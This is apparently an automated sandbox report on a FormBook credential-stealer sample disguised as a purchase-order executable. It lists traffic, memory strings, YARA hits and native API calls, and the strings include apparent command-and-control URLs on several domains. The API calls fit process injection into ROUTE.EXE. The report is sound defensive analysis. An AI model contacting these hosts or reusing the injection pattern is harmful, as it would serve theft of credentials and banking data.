22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 15 Jan 2025 17:17:17 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 15 Jan 2025 17:17:20 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: ROUTE.EXE, 00000009.00000002.3541757344.00000000042EC000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000003E3C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://maximumgroup.co.za/ktot/?6NWT=ubtLSzl&V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9
Source: ROUTE.EXE, 00000009.00000002.3541757344.00000000042EC000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000003E3C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://maximumgroup.co.za/ktot/?6NWT=ubtLSzl&V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9
Source: PO -2025918.exe, 00000000.00000002.1865271514.000000000279D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PO -2025918.exe, 00000000.00000002.1879163401.0000000005119000.00000004.00000020.00020000.00000000.sdmp, PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: nWrCyfejRZk.exe, 0000000A.00000002.3543046045.00000000058EC000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.letsbookcruise.xyz
Source: nWrCyfejRZk.exe, 0000000A.00000002.3543046045.00000000058EC000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.letsbookcruise.xyz/coi2/
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: ROUTE.EXE, 00000009.00000002.3541757344.0000000003E36000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000003986000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.vh5g.sbs/
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fasthosts.co.uk/
Source: ROUTE.EXE, 00000009.00000002.3541757344.000000000415A000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000003CAA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: ROUTE.EXE, 00000009.00000003.2301997952.0000000007BB6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://static.fasthosts.co.uk/icons/favicon.ico
Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par
Source: ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.fasthosts.co.uk/domain-names/search/?domain=$
Source: ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.fasthosts.co.uk?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_do_
Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-199510482-1

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 4.2.PO -2025918.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.PO -2025918.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2125323216.0000000001A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3540022925.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3539953830.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3543046045.0000000005840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2126495744.0000000002050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3540990423.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Contains functionality to call native functions
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_0042C9C3 NtClose, 4_2_0042C9C3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_0040AD20 NtAllocateVirtualMemory, 4_2_0040AD20
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2B60 NtClose,LdrInitializeThunk, 4_2_01BD2B60
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2DF0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_01BD2DF0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2C70 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_01BD2C70
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD35C0 NtCreateMutant,LdrInitializeThunk, 4_2_01BD35C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD4340 NtSetContextThread, 4_2_01BD4340
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD4650 NtSuspendThread, 4_2_01BD4650
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2BA0 NtEnumerateValueKey, 4_2_01BD2BA0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2B80 NtQueryInformationFile, 4_2_01BD2B80
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2BF0 NtAllocateVirtualMemory, 4_2_01BD2BF0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2BE0 NtQueryValueKey, 4_2_01BD2BE0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2AB0 NtWaitForSingleObject, 4_2_01BD2AB0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2AF0 NtWriteFile, 4_2_01BD2AF0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2AD0 NtReadFile, 4_2_01BD2AD0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2DB0 NtEnumerateKey, 4_2_01BD2DB0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2DD0 NtDelayExecution, 4_2_01BD2DD0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2D30 NtUnmapViewOfSection, 4_2_01BD2D30
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2D10 NtMapViewOfSection, 4_2_01BD2D10
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2D00 NtSetInformationFile, 4_2_01BD2D00
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2CA0 NtQueryInformationToken, 4_2_01BD2CA0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2CF0 NtOpenProcess, 4_2_01BD2CF0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2CC0 NtQueryVirtualMemory, 4_2_01BD2CC0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2C00 NtQueryInformationProcess, 4_2_01BD2C00
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2C60 NtCreateKey, 4_2_01BD2C60
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2FB0 NtResumeThread, 4_2_01BD2FB0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2FA0 NtQuerySection, 4_2_01BD2FA0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2F90 NtProtectVirtualMemory, 4_2_01BD2F90
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2FE0 NtCreateFile, 4_2_01BD2FE0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2F30 NtCreateSection, 4_2_01BD2F30
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2F60 NtCreateProcessEx, 4_2_01BD2F60
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2EA0 NtAdjustPrivilegesToken, 4_2_01BD2EA0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2E80 NtReadVirtualMemory, 4_2_01BD2E80
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2EE0 NtQueueApcThread, 4_2_01BD2EE0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2E30 NtWriteVirtualMemory, 4_2_01BD2E30
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD3090 NtSetValueKey, 4_2_01BD3090
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD3010 NtOpenDirectoryObject, 4_2_01BD3010
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD39B0 NtGetContextThread, 4_2_01BD39B0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD3D10 NtOpenProcessToken, 4_2_01BD3D10
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD3D70 NtOpenThread, 4_2_01BD3D70
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03304340 NtSetContextThread,LdrInitializeThunk, 9_2_03304340
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03304650 NtSuspendThread,LdrInitializeThunk, 9_2_03304650
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302B60 NtClose,LdrInitializeThunk, 9_2_03302B60
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302BA0 NtEnumerateValueKey,LdrInitializeThunk, 9_2_03302BA0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_03302BF0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302BE0 NtQueryValueKey,LdrInitializeThunk, 9_2_03302BE0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302AF0 NtWriteFile,LdrInitializeThunk, 9_2_03302AF0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302AD0 NtReadFile,LdrInitializeThunk, 9_2_03302AD0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302F30 NtCreateSection,LdrInitializeThunk, 9_2_03302F30
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302FB0 NtResumeThread,LdrInitializeThunk, 9_2_03302FB0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302FE0 NtCreateFile,LdrInitializeThunk, 9_2_03302FE0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302E80 NtReadVirtualMemory,LdrInitializeThunk, 9_2_03302E80
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302EE0 NtQueueApcThread,LdrInitializeThunk, 9_2_03302EE0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302D30 NtUnmapViewOfSection,LdrInitializeThunk, 9_2_03302D30
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302D10 NtMapViewOfSection,LdrInitializeThunk, 9_2_03302D10
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302DF0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_03302DF0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302DD0 NtDelayExecution,LdrInitializeThunk, 9_2_03302DD0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302C70 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_03302C70
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302C60 NtCreateKey,LdrInitializeThunk, 9_2_03302C60
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302CA0 NtQueryInformationToken,LdrInitializeThunk, 9_2_03302CA0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_033035C0 NtCreateMutant,LdrInitializeThunk, 9_2_033035C0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_033039B0 NtGetContextThread,LdrInitializeThunk, 9_2_033039B0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302B80 NtQueryInformationFile, 9_2_03302B80
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302AB0 NtWaitForSingleObject, 9_2_03302AB0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302F60 NtCreateProcessEx, 9_2_03302F60
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302FA0 NtQuerySection, 9_2_03302FA0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302F90 NtProtectVirtualMemory, 9_2_03302F90
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302E30 NtWriteVirtualMemory, 9_2_03302E30
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302EA0 NtAdjustPrivilegesToken, 9_2_03302EA0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302D00 NtSetInformationFile, 9_2_03302D00
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302DB0 NtEnumerateKey, 9_2_03302DB0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302C00 NtQueryInformationProcess, 9_2_03302C00
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302CF0 NtOpenProcess, 9_2_03302CF0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302CC0 NtQueryVirtualMemory, 9_2_03302CC0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03303010 NtOpenDirectoryObject, 9_2_03303010
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03303090 NtSetValueKey, 9_2_03303090
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03303D10 NtOpenProcessToken, 9_2_03303D10
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03303D70 NtOpenThread, 9_2_03303D70
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00AB91D0 NtCreateFile, 9_2_00AB91D0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00AB9340 NtReadFile, 9_2_00AB9340
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00AB94D0 NtClose, 9_2_00AB94D0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00AB9430 NtDeleteFile, 9_2_00AB9430
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00AB9640 NtAllocateVirtualMemory, 9_2_00AB9640
Detected potential crypto function
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0254E0CC 0_2_0254E0CC
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_07075D40 0_2_07075D40
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_070768B0 0_2_070768B0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0707D6A0 0_2_0707D6A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0707D6C0 0_2_0707D6C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0707F5C8 0_2_0707F5C8
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0707F5D8 0_2_0707F5D8
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0707DF20 0_2_0707DF20
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0707DF30 0_2_0707DF30
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_07074B20 0_2_07074B20
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_07074B30 0_2_07074B30
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0707FA10 0_2_0707FA10
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0707DAF8 0_2_0707DAF8
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0707683F 0_2_0707683F
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0707689F 0_2_0707689F
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_070875E8 0_2_070875E8
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_07089F50 0_2_07089F50
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_07084590 0_2_07084590
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_070875E2 0_2_070875E2
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_004188C3 4_2_004188C3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_004100DA 4_2_004100DA
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_004100E3 4_2_004100E3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00401240 4_2_00401240
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00403230 4_2_00403230
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00416AD0 4_2_00416AD0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00416AD3 4_2_00416AD3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_0040E2E3 4_2_0040E2E3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00401B40 4_2_00401B40
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00410303 4_2_00410303
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00401B36 4_2_00401B36
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_0040E427 4_2_0040E427
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_0040E433 4_2_0040E433
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_0040264C 4_2_0040264C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00402650 4_2_00402650
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00402669 4_2_00402669
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_0042EFC3 4_2_0042EFC3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C581CC 4_2_01C581CC
